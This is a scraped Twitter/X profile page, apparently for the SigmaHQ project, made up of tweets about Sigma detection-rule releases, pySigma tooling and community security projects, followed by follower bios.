-
Tweets359
-
Followers4K
-
Following0
-
Likes170
Hi, pySigma 0.11.5 is out 🥳 Release is github.com/SigmaHQ/pySigm…, lot of new features. Now you can use regex the casesensitive like the very old sigmac👻, here my pipeline github.com/frack113/pySig… It's going to be hard to stay and find arguments to stay with sigmac in production.☺️
New blog release @sigma_hq by @MosiMoradian How to Validate Sigma Rules with GitHub Actions for Improved Security Monitoring - blog.sigmahq.io/how-to-validat… Check it out to learn all about this collab between @sigma_hq and @grafana that resulted in a new JSON schema and a GitHub…
There is now a Sigma rule validator on the Github marketplace written by @MosiMoradian It helps you ensure that the rules you deploy to your repo can be converted using the official "pySigma" converter github.com/marketplace/ac…
⭐️This is such a rich resource --sigmahq.streamlit.app Developing in Sigma? Worth checking this out!
We recently launched a dedicated Sigma discord server. If you wanna discuss anything related to sigma and its tool chain (pysigma) you're more than welcome. discord.gg/kQQBn5W2z5
2023 has been a very busy year for the @sigma_hq team and a great year for the Sigma community at large. We've seen a greater adoption of Sigma across all of the community and even from big vendors ranging from Qradar native support for Sigma rules, Splunk leveraging Sigma for…
🪄The final #SigmaHQ r2023-12-21 release for this year is upon us. 🌟21 New Rules 🛡️55 Rule updates 🔬 30 Rule Fixes This release focused a lot on tuning and updating older rules. But we couldn't not finish the year without including a couple of interesting detections. - New…
Love the work that the impede guys are doing. The new update looks slick and the addition of @sigma_hq rules is much appreciated. Allowing users to leverage all the amazing community work from @sigma_hq and @TheDFIRReport in this first version/batch is a great step. Avoiding…
Love the work that the impede guys are doing. The new update looks slick and the addition of @sigma_hq rules is much appreciated. Allowing users to leverage all the amazing community work from @sigma_hq and @TheDFIRReport in this first version/batch is a great step. Avoiding… https://t.co/I1Nj66zSsv
Linux & macOS binaries? Covered! Our newest hunting feature allows matching Sigma rules against Linux and macOS samples, check our new post by @Joseliyo_Jstnk, including pro tips for crafting livehunt Yara rules based on Sigma: blog.virustotal.com/2023/12/sigma-…
Mastering Sigma: The Future of Security Content | Atomics on a Friday x.com/i/broadcasts/1…
🧙♂️#SigmaHQ r2023-11-20 Release is here. 🌟29 New Rules 🛡️44 Rule updates 🔬 11 Rule Fixes This release includes new rules for Lace Tempest exploitation of SysAid, coverage for CVE-2023-22518 and CVE-2023-46747 potential exploitation attempts, usage of the ActivateMicrosoftApp…
SigmAIQ: pySigma Wrapper & Utils by @AttackIQ This sounds amazing github.com/AttackIQ/SigmA…
Beyond One-Size-Fits-All: Sigma’s Approach to Taxonomies blog.sigmahq.io/why-does-sigma…
.@m3nixx and I took some time this weekend to cook something cool for Sigconverter sigconverter.io 🧑🍳 You can now apply custom pySigma processing pipelines directly on the website. You might ask what does this mean? Custom processing pipelines allows you to transform a…
The sigconverter.io website just got a sweet usability update thanks to @m3nixx 🚀 You can now bookmark your backend and pipeline configuration as well as share your rules all thanks to new URL params. 🌟 By clicking on the share icon (highlighted in the screenshot…
🧙♂️#SigmaHQ r2023-11-06 Release is here. 🌟27 New Rules 🛡️40 Rule updates 🔬9 Rule Fixes This release includes new rules related to the recently reported Diamond Sleet APT by Microsoft, couple OKTA related rules based on BeyondTrust reporting as well as rules covering the…
🧙♂️Introducing SigmaHQ GUI 🧙♂️ This tool was built specifically to easily create and update Sigma Security Content. Get started now and start exploring and creating rules -> sigmahq.streamlit.app Read more about the tool in this release blog -> blog.sigmahq.io/introducing-si… ⚒️…
I heard you liked the new Sigma sigmahq.io? Well, get ready for more 🧙♂️ Coming in the next few weeks, a built-in Sigma rule viewer where you can easily inspect, share and "admire" all the the Sigma rules 🚀
🚀 #SigmaHQ r2023-10-23 Release is here. 🚀 🌟21 New Rules 🛡️17 Rule updates 🔬24 Rule Fixes Ranging from generic detections covering Curl and CertOC abuse to Emerging Threats related to CVE-2023-27363 & CVE-2023-43261 and much more 🧙♂️ Read the release highlight blog ->…
And if you can ingest it into #SecurityOnion, you can write a @sigma_hq detection using Playbook. badda bing badda boom
And if you can ingest it into #SecurityOnion, you can write a @sigma_hq detection using Playbook. badda bing badda boom
Florian Roth @cyb3rops
180K Followers 2K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇Thomas Roccia 🤘 @fr0gger_
25K Followers 2K Following Sr. Threat Researcher @Microsoft, Malware Warlock, Threat Intel, Python🧡- Former @McAfee_labs, Goon @Defcon, Creator of #UnprotectProject - Tweets are my ownChris Sanders 🔎 �.. @chrissanders88
32K Followers 505 Following Ed.D. | Founder @networkdefense @RuralTechFund | Former @Mandiant, DoD | Author: Intrusion Detection Honeypots, Practical Packet Analysis, Applied NSMMehmet Ergene @Cyb3rMonk
11K Followers 422 Following 👉 Learn #KQL for #ThreatHunting, #DetectionEngineering, and #DFIR at https://t.co/uAlYlXIpyV - Founder @BluRavenSec | Microsoft Security MVP | #DataScienceJohn Hammond @_JohnHammond
240K Followers 2K Following Hacker. Cybersecurity Researcher @HuntressLabs || https://t.co/qUeDM3lSClNasreddine Benchercha.. @nas_bench
10K Followers 1K Following Detection @nextronsystems | @sigma_hq & LOLDrivers maintainer | Avid learner and passionate about all things #Detection #SigmaChristopher Peacock @SecurePeacock
6K Followers 2K Following Purple & Blue Teamer | Ex @RaytheonTech, @SCYTHE_IO, & @GD_OTS | BlackHat Course Author & Instructor | DEFCON #PurpleTeam Workshops | #100DaysofSigmaOlaf Hartong @olafhartong
16K Followers 934 Following @FalconForceTeam | researcher with a camera | Microsoft MVP | Snow man role model | https://t.co/bKZGWDNkDJ | https://t.co/5KkGf4YykTJamie 🔜 RSAsí �.. @jamieantisocial
6K Followers 5K Following 🤘@mitreattack for Enterprise Lead, former ATT&CK Evals water distribution engineer (the artists known as #UNC1799), @DistrictHeather ♥️🍷, he/him.Eric Capuano @eric_capuano
10K Followers 3K Following Director @limacharlieio | Founder @recon_infosec | SANS DFIR Instructor | IANS Faculty | https://t.co/yCVDASYk8s | ⬡Dr. Anton Chuvakin @anton_chuvakin
40K Followers 8K Following Information security - #SIEM, #DFIR, #EDR formerly at Gartner! Now @GoogleCloud Office of the #CISO; host of @CloudSecPodcast https://t.co/VpKtfz8nXGNathan McNulty @NathanMcNulty
13K Followers 923 Following Loves Jesus, loves others | Husband, father of 4, security solutions architect, love to learn and teach | @TribeOfHackers | 🐘infosec.exchange@nathanmcnultyMatthew @embee_research
12K Followers 1K Following Malware Researcher & Reverse Engineer | Creating and Sharing Educational Cyber ContentJohn Lambert @JohnLaTwC
44K Followers 787 Following Corporate Vice President, Security Fellow, Microsoft Security Research, johnla(AT)https://t.co/3dGtq71NbyKoen Van Impe ☕ @cudeso
4K Followers 2K Following Freelancer. CSIRT. Incident Response. Threat Intelligence. Security, IDS, Linux, OpenBSD, Honeypots, Jazz, Literature, Modern Art. https://t.co/D9bkiv10SyMISP (@misp@misp-comm.. @MISPProject
23K Followers 97 Following MISP - Threat Sharing. An open source software and standards to share, create and validate threatintel and intelligence. Mastodon @[email protected]I//uS!0nS @c03rci0n
78 Followers 891 FollowingManuel Martín @ElVigilante_com
4 Followers 43 Following Security Operations Specialist 🆘 Barely making it through yet another day, trying to be less stupid than the day before. Lessons almost learnt: https://t.co/Yo7Z46b5TiLunis3009 @lunis3009
1 Followers 174 FollowingChris Morgret @c_morgret1
67 Followers 244 Followingahmed hassan @ElbarberyHassan
0 Followers 17 Followingrewscel @rewscel
32 Followers 689 FollowingKevin Spellman @kevinspellman
255 Followers 1K Following IT. Theatre. Aviation. Weather. and some comedy to round it out.Tom Lexa @lexa_tom
34 Followers 198 FollowingJPrescillas @JPrescillas
1 Followers 242 FollowingAndrea Consadori @consadori
152 Followers 1K Following open source believer, graylog + zabbix + otrs is the perfect mixred0xff @red0xff
463 Followers 635 Following Vulnerability research at @apple Open Source / Offensive Securityz3gh0st @z3gh0st
157 Followers 644 Following Junior CERT analyst | DFIR | Cyber Threat Inteligence consumer @[email protected] @z3gh0st.bsky.social@gh0o5t @gh0o5t1
0 Followers 125 FollowingBarba sabia. @MeLlamanBorja
298 Followers 774 Following Follow the 🩶🐇 Say No More Constant Concept CyberPinkTudorel @Tudorel92659164
18 Followers 168 Following(◔‿◔) @MuntherKhalfan
68 Followers 2K FollowingMuhmmad Irfan @Muhmmad69953409
19 Followers 2K FollowingThreat Alpaca @threatalpaca
10 Followers 30 FollowingJonatan G. @jo_gwadloup
50 Followers 477 FollowingPyja @Pyjafu
22 Followers 205 FollowingMyrtus @Myrtus0x0
7K Followers 699 Following Malware Researcher | Developer | @Cryptolaemus1 | @Proofpoint. Will happily talk about malware with anyone. bsky: [email protected]Sathwik Ram Prakki @PrakkiSathwik
191 Followers 612 Following Security Researcher @Seqrite/@quickheal | APT & Darkweb | CTI | Opinions are my ownAlec West @alecwest21
36 Followers 58 FollowingStorm Booe @booestorm1
100 Followers 841 Following Just here to read about nerd things and talk trash about sports. Maroon and gold glasses wearing Gopher wrestling fan and fan of all MN sports.Scott ⭐️⭐️ @leaddonkey
136 Followers 1K Following All things buffalo. chelsea fc England and USMNT. interested in it security and social engineering.Inf0spec @inf0spec
11 Followers 64 Following Cybersecurity enthusiast. Passionate about music, art and tech. 🎸🎨💻MiLoxis @MiL0xis
0 Followers 43 Following Defender of scientific skepticism. I do research in security and AI.Tiesun 👨💻�.. @TIE__SUN
389 Followers 2K Following A guy who lives with the moments🍁. TI-Analyst | AS-Warrior2e4173e8-4da0-4b19-ab.. @ec5841a6
0 Followers 270 FollowingSteven McNutt @densem0de
1K Followers 595 Following Tech worker. Real Estate Investor https://t.co/LKYqoyt8rS @densem0de.bsky.social @[email protected] https://t.co/m9qVg4zxzsChris Roffe @croffe
464 Followers 908 Following Making network detection, forensics, and response go brrrrrrrr.t2nkg1rl @t2nkg1rl
124 Followers 487 Following cyberpunk hacker kitty - infosec, modular synths & industrial music 🏳️🌈Rubén Cybersecurity @zippycbsc
14 Followers 87 Followingjoanbrea @joan_br3a_Byte
13 Followers 61 FollowingNoobHacker @LeeBraderz9
6 Followers 687 FollowingBenJK @Alexweiss2021
19 Followers 200 FollowingNicholas Calvert @NrCalvert
239 Followers 2K Following Use architect as a verb. I like books and records and stuff like that.CyberOPS MX @CyberopsM92115
8 Followers 688 FollowingMohamed Ezzat @ZW01f
101 Followers 342 Following CS fresh graduate| Newbie Malware Analyst👾🔬 | RE & DF Enthusiast | Ctf player👨💻Alex @Alex12865237
20 Followers 170 FollowingThe sigconverter.io website just got a sweet usability update thanks to @m3nixx 🚀 You can now bookmark your backend and pipeline configuration as well as share your rules all thanks to new URL params. 🌟 By clicking on the share icon (highlighted in the screenshot…
And if you can ingest it into #SecurityOnion, you can write a @sigma_hq detection using Playbook. badda bing badda boom
Periodic reminder that @securityonion can ingest logs from many different cloud sources, if you need visibility into that part of your architecture and would rather not go blind from reading JSON straight out of an S3 bucket.
Elasticsearch keyword searches are fast and fine but misses case-insensitive searches. Event-Query-Language (EQL) sounds like a valuable answer for many security related use cases. Today I'm allowed to release pySigma-backend-elasticsearch (v1.0.8 ) with a EQL Support. @sigma_hq
Finally got my pySigma backend for PowerShell to successfully complete all of its GitHub workflows! Now that it has some credibility, I can test it against the @sigma_hq rule repository github.com/cyberphor/pySi…
Part 2 of our deep dive into the #infostealer landscape is out now, summarizing 10 of the @MITREattack techniques most commonly associated with a wide range of today's top stealers & giving practical defensive guidance aligned with each one
#Infostealers are one of our top threats for 2023 as operators increasingly move toward targeting enterprise organizations. Wondering how to defend your company? Check out our latest blog for defenses against specific TTPs! #cybersecurity hubs.la/Q01zZmPx0
Limited on-disk #detection opportunities as many families focus on evasion, but we still note a couple @sigma_hq analytics for top infostealer procedures & variations. Lots of mitigations covered, & we even pushed a new @redcanary Atomic test for a recent stealer Discovery #TTP
Uploaded our presentation for the SANS CTI SUMMIT in our GitHub. github.com/blackberry/thr… The sigma rules created during the research were merged to the official @sigma_hq repo :) #CTISummit
@jorgeorchilles @ali_alwashali @sigma_hq @nas_bench More like a band-aid then a nice fix, but it's a work around for now 🤷♂️ x.com/securepeacock/…
Today I learned about: github.dev/SigmaHQ/sigma
@ali_alwashali @sigma_hq @nas_bench @SecurePeacock had a nice fix he tweeted out.
If you write a @sigma_hq rule using the "category: ps_script" know that it's mapped to both logs ;)
Remember to check the @sigma_hq specs repository for information about available log sources, allowed tags, and fields. If there's an interesting log source missing please open an issue and we'll add it :) github.com/SigmaHQ/sigma-…
Today I start to dig Microsoft-Windows-LSA channel. I make a first rule. But you can use it if only you didn't give admin rights to anybody. 😇 github.com/SigmaHQ/sigma/… . If you find more stuff, make a Pull request. You are always welcome on @sigma_hq
Fun fact. You can use the free version of Aurora (nextron-systems.com/aurora/) to benefit from all the linked SIGMA rules at the end of each @TheDFIRReport for FREE. If you couple that with the dashboard feature (see here x.com/cyb3rops/statu…) You'll get live alerts.
Unwrapping Ursnifs Gifts ➡️Initial Access: Ursnif ISO/LNK/DLL ➡️Discovery: Get-ADComputer, nltest, net view, etc. ➡️Credentials: LSASS access ➡️Lateral: Impacket ➡️Persistence: Registry Run Key ➡️C2: Ursnif, Cobalt Strike thedfirreport.com/2023/01/09/unw… 1/X
Now you can have in your MISP galaxies related to @sigma_hq. Next days I'll update the script since I've added the relationship with @MITREattack :) If you want to get more info about this script and the motivation: jstnk9.github.io/jstnk9/blog/Si… Thank you @adulau and @MISPProject 💙
A huge thank to @Joseliyo_Jstnk for the work on converting automatically @sigma_hq rules into a @MISPProject galaxy. I finally found the time to merge it in the default galaxies. The MISP galaxy will be updated at reach release automatically. #threatintel github.com/jstnk9/MISP/pu…
A huge thank to @Joseliyo_Jstnk for the work on converting automatically @sigma_hq rules into a @MISPProject galaxy. I finally found the time to merge it in the default galaxies. The MISP galaxy will be updated at reach release automatically. #threatintel github.com/jstnk9/MISP/pu…
Just learned about the Open Source Security Index, tracking the most popular and fastest growing open source security projects on GitHub. opensourcesecurityindex.io ⚛️ Great to see Atomic Red Team hovering near the top, and in some predictably great company (@sigma_hq at #5).
I've developed a script to create @MISPProject galaxies from @sigma_hq rules. In the past I did something similar but with taxonomies. Contextual information was lost in that way. Full blog with explanation: jstnk9.github.io/jstnk9/blog/Si… Galaxies & script: github.com/jstnk9/MISP/tr… 🧵
Just wrote an article about how easy (and fun) it is to get involved with real-world #threatdetection using Atomic Red Team, @MITREattack, and @sigma_hq. Let me know what you think! link.medium.com/lb0ppknbIvb